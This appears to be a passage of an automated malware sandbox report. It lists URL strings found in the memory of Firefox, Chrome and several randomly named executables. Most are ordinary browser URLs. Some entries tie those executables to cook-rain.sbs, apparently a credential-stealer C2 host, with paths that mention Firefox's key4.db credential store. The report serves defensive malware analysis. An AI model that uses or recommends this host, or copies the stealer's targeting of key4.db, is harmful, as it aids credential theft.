                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/language-tools/
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search-engines/
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search?q=%TERMS%&platform=%OS%&appver=%VERSION%
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/themes
                          Source: firefox.exe, 00000030.00000003.3044314629.000001E57D65B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://allegro.pl/
                          Source: chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4830
                          Source: chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4966
                          Source: chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/5845
                          Source: chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/6574
                          Source: chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7161
                          Source: chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7162
                          Source: chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7246
                          Source: chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7308
                          Source: chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7319
                          Source: chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7320
                          Source: chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7369
                          Source: chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7382
                          Source: chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7489
                          Source: chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7604
                          Source: chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7714
                          Source: chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7847
                          Source: chrome.exe, 00000022.00000003.2884723691.00007DA4025C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2890524237.00007DA40260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7899
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://api.accounts.firefox.com/v1
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://apps.apple.com/app/firefox-private-safe-browser/id989804926
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://apps.apple.com/us/app/firefox-private-network-vpn/id1489407738
                          Source: firefox.exe, 00000030.00000003.3234358102.000001E575C2D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aus5.mozilla.org
                          Source: firefox.exe, 00000030.00000003.3234358102.000001E575C2D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aus5.mozilla.org/
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://aus5.mozilla.org/update/3/GMP/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%OS_VER
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://aus5.mozilla.org/update/3/SystemAddons/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL
                          Source: firefox.exe, 00000030.00000003.3216743370.000001E57D1DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3147455615.000001E57D1DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aus5.mozilla.org/update/6/Firefox/118.0.1/20230927232528/WINNT_x86_64-msvc-x64/en-US/release
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://blocked.cdn.mozilla.net/
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://blocked.cdn.mozilla.net/%blockID%.html
                          Source: 7b9f3f6834.exe, 00000009.00000003.2723646367.0000000005DC8000.00000004.00000800.00020000.00000000.sdmp, 7b9f3f6834.exe, 00000009.00000003.2724507880.0000000005DC8000.00000004.00000800.00020000.00000000.sdmp, a78a39a396.exe, 0000000A.00000002.3193106380.0000000001A3F000.00000004.00000020.00020000.00000000.sdmp, a78a39a396.exe, 0000000A.00000002.3262207220.0000000023F62000.00000004.00000020.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2879532375.0000000005E63000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2912418827.000001C300FC9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2921553083.000001F3C37EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
                          Source: 7b9f3f6834.exe, 00000009.00000003.2723646367.0000000005DC8000.00000004.00000800.00020000.00000000.sdmp, 7b9f3f6834.exe, 00000009.00000003.2724507880.0000000005DC8000.00000004.00000800.00020000.00000000.sdmp, a78a39a396.exe, 0000000A.00000002.3193106380.0000000001A3F000.00000004.00000020.00020000.00000000.sdmp, a78a39a396.exe, 0000000A.00000002.3262207220.0000000023F62000.00000004.00000020.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2879532375.0000000005E63000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2912418827.000001C300FC9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2921553083.000001F3C37EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
                          Source: firefox.exe, 00000030.00000003.3147455615.000001E57D1DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1539075
                          Source: firefox.exe, 00000030.00000003.3147455615.000001E57D1DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1584464
                          Source: firefox.exe, 00000030.00000003.3147455615.000001E57D1DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1607439
                          Source: firefox.exe, 00000030.00000003.3147455615.000001E57D1DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1616739
                          Source: 7b9f3f6834.exe, 00000009.00000003.2647648125.0000000005DEF000.00000004.00000800.00020000.00000000.sdmp, 7b9f3f6834.exe, 00000009.00000003.2648045423.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp, 7b9f3f6834.exe, 00000009.00000003.2647840214.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2811496040.0000000005E9D000.00000004.00000800.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2811369674.0000000005E9F000.00000004.00000800.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2811865064.0000000005E9D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                          Source: 7b9f3f6834.exe, 00000009.00000003.2647648125.0000000005DEF000.00000004.00000800.00020000.00000000.sdmp, 7b9f3f6834.exe, 00000009.00000003.2648045423.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp, 7b9f3f6834.exe, 00000009.00000003.2647840214.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp, a78a39a396.exe, 0000000A.00000002.3193106380.00000000019E2000.00000004.00000020.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2811496040.0000000005E9D000.00000004.00000800.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2811369674.0000000005E9F000.00000004.00000800.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2811865064.0000000005E9D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                          Source: 7b9f3f6834.exe, 00000009.00000003.2647648125.0000000005DEF000.00000004.00000800.00020000.00000000.sdmp, 7b9f3f6834.exe, 00000009.00000003.2648045423.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp, 7b9f3f6834.exe, 00000009.00000003.2647840214.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp, a78a39a396.exe, 0000000A.00000002.3193106380.00000000019E2000.00000004.00000020.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2811496040.0000000005E9D000.00000004.00000800.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2811369674.0000000005E9F000.00000004.00000800.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2811865064.0000000005E9D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                          Source: chrome.exe, 00000022.00000003.2870150846.0000082800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2883346954.000008280080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
                          Source: chrome.exe, 00000022.00000003.2870150846.0000082800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2883346954.000008280080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
                          Source: chrome.exe, 00000022.00000003.2872758565.0000082800684000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
                          Source: chrome.exe, 00000022.00000003.2870150846.0000082800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2883346954.000008280080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
                          Source: chrome.exe, 00000022.00000003.2867107446.00001F64002D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2867217341.00001F64002E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/cr/report
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://color.firefox.com/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_content=theme-f
                          Source: firefox.exe, 0000001A.00000003.2819477848.0000018D7271E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2818931962.0000018D74800000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2820218486.0000018D7273A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2822012559.0000018D72773000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2821424363.0000018D72757000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3234358102.000001E575C2D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://completion.amazon.com/search/complete?q=
                          Source: firefox.exe, 00000030.00000003.3193059992.000001E5802B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://content-signature-2.cdn.mozilla.net
                          Source: firefox.exe, 00000030.00000003.3193059992.000001E5802B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://content-signature-2.cdn.mozilla.net/
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://content.cdn.mozilla.net
                          Source: 7b9f3f6834.exe, 00000009.00000003.2723646367.0000000005DC8000.00000004.00000800.00020000.00000000.sdmp, 7b9f3f6834.exe, 00000009.00000003.2724507880.0000000005DC8000.00000004.00000800.00020000.00000000.sdmp, a78a39a396.exe, 0000000A.00000002.3193106380.0000000001A3F000.00000004.00000020.00020000.00000000.sdmp, a78a39a396.exe, 0000000A.00000002.3262207220.0000000023F62000.00000004.00000020.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2879532375.0000000005E63000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2912418827.000001C300FC9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2921553083.000001F3C37EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
                          Source: 7b9f3f6834.exe, 00000009.00000003.2723646367.0000000005DC8000.00000004.00000800.00020000.00000000.sdmp, 7b9f3f6834.exe, 00000009.00000003.2724507880.0000000005DC8000.00000004.00000800.00020000.00000000.sdmp, a78a39a396.exe, 0000000A.00000002.3193106380.0000000001A3F000.00000004.00000020.00020000.00000000.sdmp, a78a39a396.exe, 0000000A.00000002.3262207220.0000000023F62000.00000004.00000020.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2879532375.0000000005E63000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2912418827.000001C300FC9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2921553083.000001F3C37EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                          Source: firefox.exe, 00000030.00000003.3209599840.000001E57D581000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile.services.mozilla.com
                          Source: firefox.exe, 00000030.00000003.3209599840.000001E57D59C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile.services.mozilla.com/
                          Source: firefox.exe, 00000030.00000003.3209599840.000001E57D581000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile.services.mozilla.com/v1/tiles
                          Source: 7b9f3f6834.exe, 0000000B.00000003.3058350373.0000000001A72000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/
                          Source: 7b9f3f6834.exe, 0000000B.00000003.2902024958.0000000001A5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/6-
                          Source: 7b9f3f6834.exe, 0000000B.00000003.2902024958.0000000001A5A000.00000004.00000020.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2924608314.0000000001A6A000.00000004.00000020.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2924386969.0000000001A64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/JjhOzS
                          Source: 7b9f3f6834.exe, 0000000B.00000003.2956676720.0000000001A7B000.00000004.00000020.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2971680852.0000000001A73000.00000004.00000020.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2957885411.0000000001A7B000.00000004.00000020.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2948971883.0000000001A7B000.00000004.00000020.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2954019129.0000000001A7B000.00000004.00000020.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2994856913.0000000001A7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/K.
                          Source: 7b9f3f6834.exe, 0000000B.00000003.2971680852.0000000001A73000.00000004.00000020.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2957885411.0000000001A7B000.00000004.00000020.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2994856913.0000000001A7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/a.
                          Source: 7b9f3f6834.exe, 0000000B.00000003.2972912512.0000000001A67000.00000004.00000020.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2995909673.00000000019EF000.00000004.00000020.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.3059594242.00000000019EE000.00000004.00000020.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2949106642.0000000001A4F000.00000004.00000020.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2874285828.00000000019EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/api
                          Source: 7b9f3f6834.exe, 0000000B.00000003.2874285828.0000000001A5A000.00000004.00000020.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2876379077.0000000001A5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/api(
                          Source: 7b9f3f6834.exe, 0000000B.00000003.2902024958.0000000001A5A000.00000004.00000020.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2924608314.0000000001A6A000.00000004.00000020.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2924386969.0000000001A64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/api-
                          Source: 7b9f3f6834.exe, 0000000B.00000003.3058822351.0000000001A67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/api1
                          Source: 7b9f3f6834.exe, 0000000B.00000003.2949106642.00000000019EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/apiKEX
                          Source: 7b9f3f6834.exe, 00000009.00000002.2849912113.00000000016E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/api_
                          Source: 7b9f3f6834.exe, 00000009.00000002.2849912113.000000000168F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/apierOK
                          Source: 7b9f3f6834.exe, 0000000B.00000003.3058427849.0000000001A4A000.00000004.00000020.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2995909673.0000000001A4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/apis
                          Source: 7b9f3f6834.exe, 0000000B.00000003.2902024958.0000000001A5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/apit
                          Source: 7b9f3f6834.exe, 0000000B.00000003.2843842598.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2844467445.0000000005E63000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/apiy
                          Source: 7b9f3f6834.exe, 0000000B.00000003.2843842598.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2844467445.0000000005E63000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/azTht1
                          Source: 7b9f3f6834.exe, 00000009.00000002.2849912113.00000000016C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/h
                          Source: 7b9f3f6834.exe, 0000000B.00000003.2924831516.0000000001A75000.00000004.00000020.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2902024958.0000000001A5A000.00000004.00000020.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2874285828.0000000001A5A000.00000004.00000020.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2924471695.0000000001A71000.00000004.00000020.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2876379077.0000000001A5A000.00000004.00000020.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2924386969.0000000001A64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/h.
                          Source: 7b9f3f6834.exe, 0000000B.00000003.2902024958.0000000001A5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/l-
                          Source: 7b9f3f6834.exe, 0000000B.00000003.2949036773.0000000001A6A000.00000004.00000020.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.3058822351.0000000001A67000.00000004.00000020.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2902024958.0000000001A5A000.00000004.00000020.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2995867973.0000000001A6A000.00000004.00000020.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2924608314.0000000001A6A000.00000004.00000020.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2972912512.0000000001A67000.00000004.00000020.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2874285828.0000000001A5A000.00000004.00000020.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2876379077.0000000001A5A000.00000004.00000020.00020000.00000000.sdmp, 7b9f3f6834.exe, 0000000B.00000003.2924386969.0000000001A64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/mXy9MS
                          Source: 7b9f3f6834.exe, 00000009.00000002.2849912113.00000000016E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/ns/
                          Source: 7b9f3f6834.exe, 00000009.00000002.2849912113.00000000016E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs/pi
                          Source: 7b9f3f6834.exe, 0000000B.00000003.3059594242.00000000019D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs:443/api
                          Source: 7b9f3f6834.exe, 0000000B.00000003.3059594242.00000000019D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs:443/api-jTK
                          Source: 7b9f3f6834.exe, 0000000B.00000003.3059594242.00000000019D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs:443/apirsion.txtPK
                          Source: 7b9f3f6834.exe, 0000000B.00000003.3059594242.00000000019D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cook-rain.sbs:443/apix/fqs92o4p.default-release/key4.dbPK
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://coverage.mozilla.org
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://crash-stats.mozilla.org/report/index/
                          Source: 159c892ab5.exe, 00000008.00000003.2512167516.0000000007302000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
                          Source: 159c892ab5.exe, 00000008.00000003.2512167516.0000000007302000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
                          Source: 159c892ab5.exe, 00000008.00000003.2512167516.0000000007302000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://dap-02.api.divviup.org
                          Source: firefox.exe, 00000030.00000003.2994713979.000001E575EBB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3093201942.000001E580493000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3009151915.000001E575EBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinations
                          Source: firefox.exe, 0000001D.00000002.2912134037.000001C300CA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2920018499.000001F3C3480000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://developers.google.com/safe-browsing/v4/advisory
                          Source: firefox.exe, 00000030.00000003.3143732764.000001E57D3D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/
